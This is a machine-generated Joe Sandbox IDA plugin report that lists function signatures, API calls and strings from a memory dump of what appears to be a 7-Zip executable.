                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID: act:$ cpus:$ gran:$ page:
                                                                                                                                                                                                                                • API String ID: 1294909896-454015223
                                                                                                                                                                                                                                • Opcode ID: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                                                                                                                • Instruction ID: 93506525babe4a88b847c2da46c4ada4fdb68895259a503bbc854e35656657ab
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76ce10e08a2d6057f8ef9cd9582c59867cc4f4bd53d0f5b9092ac68896eb7e3a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9251A565340A41A2DE28EB56EA513AC2372EBB97D0F849233EA1F07B59DF78C595C340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 001E01D7
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001E02EA
                                                                                                                                                                                                                                  • Part of subcall function 001DFD30: _CxxThrowException.MSVCRT ref: 001DFE50
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001E031F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • There is no second file name for rename pair:, xrefs: 001E0302
                                                                                                                                                                                                                                • Empty file path, xrefs: 001E02CD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionThrow$free
                                                                                                                                                                                                                                • String ID: Empty file path$There is no second file name for rename pair:
                                                                                                                                                                                                                                • API String ID: 3129652135-1725603831
                                                                                                                                                                                                                                • Opcode ID: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                                                • Instruction ID: 36f30711756e223f016bdcfd9adecf1c97d7ed96b9320c3b16b32a7b3f4bb7d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b9fd34c360db10dc0dd9c3cf23a0ee1fe89007478e2cf63242fd60c53b15542
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E41C272204AC5C5CA21DB1AE88479E6760F3A97B4F504312EFB9077D9DB78C5C6CB40
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastSecurity
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 555121230-0
                                                                                                                                                                                                                                • Opcode ID: dbe237cfadc90cb09746e3018bc91a680bb73bee37176d8e7191999cda9ad572
                                                                                                                                                                                                                                • Instruction ID: 3374619f718c76ecb4efbfdfdaffe72d5776a3af73dc7dd86b948385f3d117e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dbe237cfadc90cb09746e3018bc91a680bb73bee37176d8e7191999cda9ad572
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC418D33300A8896C761DF26E8447B973A6F388B98F594135DF5A8BB25DF70C886C751
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID: = $h<"
                                                                                                                                                                                                                                • API String ID: 1294909896-3841148799
                                                                                                                                                                                                                                • Opcode ID: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                                                                                                                • Instruction ID: 22757411ef2aafb3ab6ae986d1c86614a698dc10e29cda6e75006a47de584feb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E319672225A8096CB10EF55E48039EB765F7F1764F944223FA9E43B68DBB8C985CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID: #
                                                                                                                                                                                                                                • API String ID: 1294909896-1885708031
                                                                                                                                                                                                                                • Opcode ID: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                                                                                                                • Instruction ID: 48c58931a47967ca12d92a011e6276732bd43997a1011c8ee3d586e9f7e63318
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0f2d60c1820faef58548d21b8c4e06079b1368b0e0d09608c7fde7dbc05df21
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D131A423224B9581CB20DE15A98046EA769F7E47E4F550522FFAF477A5CF35C891CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,001D3E32), ref: 001D3D18
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,FFFFFFFF,?,?,?,001D3E32), ref: 001D3D25
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001D3D4E
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,FFFFFFFF,?,?,?,001D3E32), ref: 001D3DC1
                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 001D3DFA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharExceptionMultiThrowWide$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2296236218-0
                                                                                                                                                                                                                                • Opcode ID: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                                                                                                                                                                                • Instruction ID: 4c6720d9f9389926c70a61909c06167dfc482020f421239b7d128966cb609d3f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a638d3b70a987569a11810fe08a21e1709710d38c6574b86da1fec5f089001b5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23310673704BC59ACB20CF25E48435EBBA6F795B94F558022DF9963724DB38C981DB02
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                                                                                                                • Instruction ID: c5452d8138edb4d7ca86a9f1f7884ec408eec317bfe16f842e693c989d51b228
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b578af894f36024e1f437a4cb75a0fc809cf4cc32df710a6eb33f0fd421a2ea5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18215A67312B4086CB259F25D8503696370EBE5FA8F298222DF3D17798DF35C8528310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Create$CloseHandleTimefree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 234454789-0
                                                                                                                                                                                                                                • Opcode ID: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                                                                                                                                                                                • Instruction ID: a6863f7b7619450cebb0576519ff467f250d62448f11f1f453a2c86a268a484c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c2437ba34a7087855f8770e7a2108f964c72db211cbb1ecc9a6ff53a80baa42
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F21C63230468096D660DF16FA54B5A6721F3957F8F544322EE79437E8CB39C98AD700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                                                • Opcode ID: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                                                                                                                                                                                                                • Instruction ID: 27f18c794e224f1e11b330946fd604de351f0141416eb4e8fdf397960b0b0d43
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ace886e5cc3e700f187fce602ca08dcd48d7174a31f1a447d5d23bb38321506
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF11DFB6309749A1EF088F669E553F823619B55FC4F864420DF0A9B205EF78CE9AE341
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 001DB544: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,Path64,001F82CA), ref: 001DB56F
                                                                                                                                                                                                                                  • Part of subcall function 001DB45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 001DB4AA
                                                                                                                                                                                                                                  • Part of subcall function 001DB45C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,80000001), ref: 001DB4F8
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F8343
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
                                                                                                                                                                                                                                  • Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C
                                                                                                                                                                                                                                  • Part of subcall function 001D8624: free.MSVCRT ref: 001D86A9
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F832B
                                                                                                                                                                                                                                • free.MSVCRT ref: 001F8336
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$QueryValue$Openmemmove
                                                                                                                                                                                                                                • String ID: 7z.dll$Software\7-zip
                                                                                                                                                                                                                                • API String ID: 2771487249-1558686312
                                                                                                                                                                                                                                • Opcode ID: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                                                                                                                • Instruction ID: 33934e4d25aaf1a2223d5fa92ef5feeb49ffd583e32c998baaab3e6b446c2b65
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 232e922c7f0ce51f826d985996c137ff839169f93ea0f5e4105b3c8395333e57
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11115A6234494490CA20EB11E5553EEA725EBF5BE4FC45213EE6E47766DF3CC64AC700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3873070119-0
                                                                                                                                                                                                                                • Opcode ID: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
                                                                                                                                                                                                                                • Instruction ID: 71fb33c458eb6660e6868a6e3f137b3af3469ce5bb329d469f08e7219e2b6db6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 689b2ef2104b8583ad3e374e0ff24f5fd2d7cb2a6ea87d3443a7ff945e4a4c65
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4211217221498592DB20DF25E94475DA330F7A9B94F444222EFAD43BA4DF3CC955C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateDirectoryfree$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3252411863-0
                                                                                                                                                                                                                                • Opcode ID: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                                                                                                                • Instruction ID: e6e60f67d528fe6e2701cd2de96be02079f266e191257cb031a6931b986e3fca
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc7c84208e05cc916470f72eeea78ecee52ed3ec44cc2f5207f8f15f03265912
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B401A722304A00C1DA30DB61EA8437D5322ABD67F0F584322DEBD837A5DF2CC9468710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                                                                                                                • Instruction ID: 032f591cba0d2891e96640397fad74b8b097a854b7cb13b179d3c5ee6babe88f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cc3be562f800f66c890074482ac147a4380dffb5d2304e0dd1a317519950c51
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCF03A63266A0482CA06FE32E46522E5320A7E7F91F085463DF2E53352DF38D497C314
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                                                                                                                • Instruction ID: 25e64f17f17591b35c2844c286517c4b32dc38289a3b01ad6a65a3e892abc5ef
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76439c2ae6d2279247935120ce8afe15d695928ca0b2e8dcd2c70b0a6abef4e1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AE0E26261040481CB14AF66DCA20282334ABB5F887189052DB3E8B325CE30E85283A4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • free.MSVCRT ref: 002125EC
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00212636
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$freememset
                                                                                                                                                                                                                                • String ID: Name$Size
                                                                                                                                                                                                                                • API String ID: 2276422817-481755742
                                                                                                                                                                                                                                • Opcode ID: 88c80eeaa9b14fedc55482967235be8f5d37a87fac4782eb4143f45c95df4591
                                                                                                                                                                                                                                • Instruction ID: 5d5b5994709e1047dc8488f34d229f09f723fe05f4b86026ad05f835344ad3ee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88c80eeaa9b14fedc55482967235be8f5d37a87fac4782eb4143f45c95df4591
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB41C572220685E1CB2ADF34E4947DE3760F764758FC45122EF6E42251DF78CAAAC300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021BDCD
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021BE0B
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$memset
                                                                                                                                                                                                                                • String ID: : Removing files after including to archive$Removing
                                                                                                                                                                                                                                • API String ID: 3543874852-1218467041
                                                                                                                                                                                                                                • Opcode ID: 35889d15da0440bc8b65f489fa0c5df01c345507fef3a03229262cdd598ad02f
                                                                                                                                                                                                                                • Instruction ID: f075a37f40432fe2762b271b2eb0a8c59e142a113fb471484de436b3d7b10fdc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 35889d15da0440bc8b65f489fa0c5df01c345507fef3a03229262cdd598ad02f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5317072214A85A2DE79EF35E4853EEA360E774744F448022DBAF462A1DF7CD4CAC300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021C4FD
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021C50D
                                                                                                                                                                                                                                • free.MSVCRT ref: 0021C553
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
